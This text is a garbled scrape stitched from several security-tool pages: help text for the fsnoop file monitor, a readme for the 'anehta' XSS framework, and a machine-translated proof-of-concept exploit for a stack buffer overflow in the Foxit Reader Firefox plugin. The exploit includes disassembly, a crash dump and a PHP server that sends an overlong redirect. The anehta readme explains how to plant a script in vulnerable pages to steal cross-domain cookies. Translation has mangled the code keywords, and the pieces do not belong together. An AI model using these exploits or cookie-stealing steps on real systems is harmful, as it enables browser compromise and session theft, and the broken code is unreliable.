Very easy, you only need one WPA handshake
Detections believed to be false positives [ use sandbox anyway ]
VIDEO
$ ./fsnoop --help fsnoop monitors file operations by using the Inotify mechanism. Usage: fsnoop [OPTIONS] [DIR1[,DIR2,...]] [-- COMMAND] -d Run as a daemon -fd Open file descriptors when it's possible -k Send SIGSTOP signal to the running process (COMMAND) -o filename Output is redirected to a specific file -r Monitor directory contents recursively -t Prefix each line with the time of day If no DIR is specified, default writable directories such as /tmp, /var/tmp, /dev/shm, etc. are monitored. If COMMAND is specified, it will monitor activities during the process duration.
[C] -rw------- 1 root root 0 Tue May 8 22:17:10 2012 /var/tmp/test [M] -rw-r--r-- 1 root root 0 Tue May 8 22:17:10 2012 /var/tmp/test [U] -rw-r--r-- 1 root root 1741 Tue May 8 22:17:27 2012 /var/tmp/test [M] -rwxrwxrwx 1 root root 1741 Tue May 8 22:17:27 2012 /var/tmp/test [D] F /var/tmp/testAn event begins with an action character (placed between brackets):
# ./fsnoop /etc,/tmp Starting fsnoop version 2.0 [+] monitor /etc [+] monitor /tmpTo run Fsnoop as a daemon in order to monitor the "/var/tmp" directory and record activities in the "/root/fsnoop.log" file:
# ./fsnoop -d -t -o /root/fsnoop.log /var/tmp Starting fsnoop version 2.0Output log will look like this:
# cat /root/fsnoop.log [+] monitor /var/tmp (20:10:00) [C] -rw-r--r-- 1 root root 0 Mon Jul 9 20:10:00 2012 /var/tmp/blurb-lock (20:10:00) [M] -rw-r--r-- 1 root root 0 Mon Jul 9 20:10:00 2012 /var/tmp/blurb-lock (20:13:02) [D] F /var/tmp/blurb-lockTo monitor file activities just during a process duration:
$ ./fsnoop /tmp -- Xorg -ac :1 Starting fsnoop version 2.0 [+] monitor /tmpTo send the SIGSTOP signal to a process right after an event occurs:
$ ./fsnoop -k /tmp/.tX1-lock -- Xorg -ac :1 [...] [C] F /tmp/.tX0-lock *** PID 30342 stopped, type [Enter] to resume execution: *** PID 30342 resumed ...To read the content of a file that has been erased:
$ ./fsnoop -fd /var/tmp [+] monitor /var/tmp [+] As then "-fd" option is being used, you can launch new shell by using "ctrl-c" and disclose file descriptors content. [C] -rw-r--r-- 1 root root 0 Tue Jan 1 21:39:55 2013 /var/tmp/temp.2oPahVp (opened fd=5) [U] -rw-r--r-- 1 root root 13 Tue Jan 1 21:40:37 2013 /var/tmp/temp.2oPahVp [D] F /var/tmp/temp.2oPahVp ^C Here are opened file descriptors. You can display their contents by using the "cat" command. For example, to display fd #4 use: "cat <&4" lrwx------ 1 vladz vladz 64 1 janv. 21:43 0 -> /dev/pts/3 lr-x------ 1 vladz vladz 64 1 janv. 21:43 5 -> /var/tmp/temp.2oPahVp (deleted) fsnoop$ cat <&5To monitor directories recursively:
$ mkdir -p /tmp/a/b/c/d/e/f $ touch /tmp/a/b/c/d/e/f/aEvent will be caught:
$ ./fsnoop -r /tmp [+] monitor /tmp [C] -rw-r--r-- 1 vladz vladz 0 Thu Jan 24 13:10:30 2013 /tmp/a/b/c/d/e/f/a
|
ip_addr
(or a regular function if we optimize constant away from runtime exec - see below about purity);(eth) ((ip) (...) or (arp) (...))
. in other words, the proto list should be a special form (binding current protos) rather than a fixed preamble.set?
predicates;File: | |
---|---|
Description: | === Enviroment === 1. PHP4/5 (PHP5 is recommended) 2. Apache or IIS === Install & Configure === 1. Decompress all the files in a directory on your server 2. Make sure your directory has the write permission. 3. Modify $U as username and $P as password in "server/class/auth_Class.php" file. Default username is "admin" and default password is "123456". 4. If you want to send mail, modify "server/mail.php" file to your own mail server or mailbox. === Quick Start === 1. Login and turn to the Configure tab. 2. Input the "anehtaurl" as the url where your anehta is. For example: "http://www.a.com/anehta". 3. You should also input the boomerang src and boomerang target. boomerang src is usually the same page where you put your feed.js is. For example: boomerang src maybe: "http://www.b.com/xssed.html?param=". boomerang target must be the page where you want to steal cross domain cookie. For example: boomerang target maybe: "http://www.alimafia.com/xssDemo.html#'><'". You can modify feed.js to cancel the xcookie module if you do not want to use boomerang. But you must always set boomerang src and target values when you modify in the configure tab. 4. After modified configure, simply load feed.js as a external script to where your xss page is. There is also a demo page in the directory which is "demo.html" 5. Refresh the admin.php, and you may see some changes if your xss slave coming. === More Support === Home page: http://anehta.googlecode.com Blog: http://hi.baidu.com/aullik5 (Many Docs here) Demo Video: http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html Author: axis@ph4nt0m.org Feel free to tell me your advise. |
SHA1 Checksum: | 623853b2d834e696b4c264c22ef877ecfa588fbb What's this? |
File: | |
---|---|
Description: | Not working bash script to test if I can upload files. |
SHA1 Checksum: | 0fe79f78dd385433edb70279306fc4974b9f0c77 What's this? |
File: | |
---|---|
Description: | Not working bash script to test if I can upload files. |
SHA1 Checksum: | 0fe79f78dd385433edb70279306fc4974b9f0c77 What's this? |
<? php * / Foxit Reader <= Plugin para Firefox 5.4.4.1128 overlong npFoxitReaderPlugin.dll Query String remoto Stack Buffer Overflow PoC rgod --------------------------- (Ouvinte) Testado contra Microsoft Windows Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920 Foxit Reader 5.4.4.1128 Arquivo: npFoxitReaderPlugin.dll Versão: 2.2.1.530 Url produto: http://www.foxitsoftware.com/downloads/ Arquivo de instalação última versão: FoxitReader544.11281_enu_Setup.exe Uso: Lançamento da linha de comando, em seguida, navegar com o Firefox porta 6666. Você também pode testá-lo através do site: http://192.168.0.1/x.pdf? [A x 1024] Arquivo deve ser existentes ou o servidor deve estar respondendo com o cabeçalho Content-Type adequada. código vulnerável, npFoxitReaderPlugin.dll: , ------------------------------------------------- ----------------------------- L1000162F: empurrar ebx empurrar esi empurrar edi mov edi, ebp ou ecx, FFFFFFFFh xor eax, eax xor ebx, ebx esi xor, esi REPNE SCASB não ecx dezembro ecx teste ecx, ecx jle L100016E4 L1000164A: mov al, [esi + ebp] mov word ptr [esp 18 h], 0000h cmp al, 25h jz L10001661 mov ecx, [esp Ch 1] mov [ebx + ecx], o jmp L100016CE L10001661: mov al, [esi + ebp 01 h] cmp al, 30h jl L1000166D cmp al, 39h jle L1000167D L1000166D: cmp al, 41h jl L10001675 cmp al, 46h jle L1000167D L10001675: cmp al, 61H jl L100016C6 cmp al, 66h jg L100016C6 L1000167D: mov dl, [esi + ebp 01 h] esi inc esi inc leia ecx, [esp +10 h] mov [esp 18 h], dl empurrar ecx mov al, [esi + ebp] lea edx, [esp Ch 1] empurrar L100450D4 empurrar edx mov [esp 25 h], o chamar SUB_L10006421 mov eax, [esp Ch 1] leia ecx, [esp 24 h] empurrar eax empurrar L100450D0 empurrar ecx chamar SUB_L100063CF mov eax, [esp 34 h] mov dl, [esp 30 h] adicionar esp, 00000018h mov [ebx + eax], dl jmp L100016CE L100016C6: mov ecx, [esp Ch 1] mov byte ptr [ebx + ecx], 25h L100016CE: inc ebx mov edi, ebp ou ecx, FFFFFFFFh xor eax, eax esi inc REPNE SCASB não ecx dezembro ecx cmp esi, ecx jl L1000164A L100016E4: mov edx, [esp Ch 1] edi pop esi pop mov eax, 00000001H mov byte ptr [ebx + edx], 00h pop ebx pop ebp pop ecx retn , ------------------------------------------------- ----------------------------- copiar este ciclo termina em substituição ponteiros de pilha, em seguida, (Ao ligar para plugin-container.exe): (F48.1778): violação de acesso - código c0000005 (primeira chance) Exceções de primeira chance são relatados antes de qualquer tratamento de exceção. Essa exceção pode ser esperado e manipulados. eax = 00000341 ebx = 0076ed4c 002cf414 edx = ecx = esi = 41414141 edi = 002cf414 0076e9e8 eip = 10016852 esp = 002cf3f8 ebp = iopl = 0 nv up ei pl 75eacdf8 nz nd po nc cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00010202 ! npFoxitReaderPlugin NP_GetEntryPoints 0 x15672: 10016852 8906 mov dword ptr [esi], eax ds: 0023:41414141 =???? ... Tentativa de escrever para tratar 41414141 ... Também ponteiros SEH são substituídas * / error_reporting ( 0 ); set_time_limit ( 0 ); $ Porta = 6666 ; ____ $ Redirecionar = "HTTP/1.1 301 Movido Permanentemente \ r \ n" . "Servidor: Apache \ r \ n" . "Localização:? / x.pdf" . str_repeat ( "A" , 1024 .) "\ r \ n " . Content-Type ": text / html \ r \ n \ r \ n" ; $ ____ Crescimento = "HTTP/1.1 200 OK \ r \ n" . "Servidor: Apache \ r \ n" . "Accept-Ranges: bytes \ r \ n" . "Content-Length: 60137 \ r \ n" . " ": Content-Type application / pdf \ r \ n . "Connection: keep-alive \ r \ n \ r \ n" ; $ Socket = stream_socket_server ( "tcp :/ / 0.0.0.0" . $ port , $ errno , $ errstr ); se (! $ socket ) { ECHO "$ errstr ($ errno) \ n" ; } mais { ECHO "escutando na porta TCP público" . $ port . "\ n" ; enquanto ( $ conn = stream_socket_accept ( $ socket )) { $ linha = fgets ( $ conn ); senhorita
D : \ xampplite \ htdocs > d : \ xampplite \ php \ php . exe - fx . php Ouvir em público a porta TCP 6666 GET / x . pdf ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA / 1,1E, finalmente, visam corrigir o endereço e porta no navegador: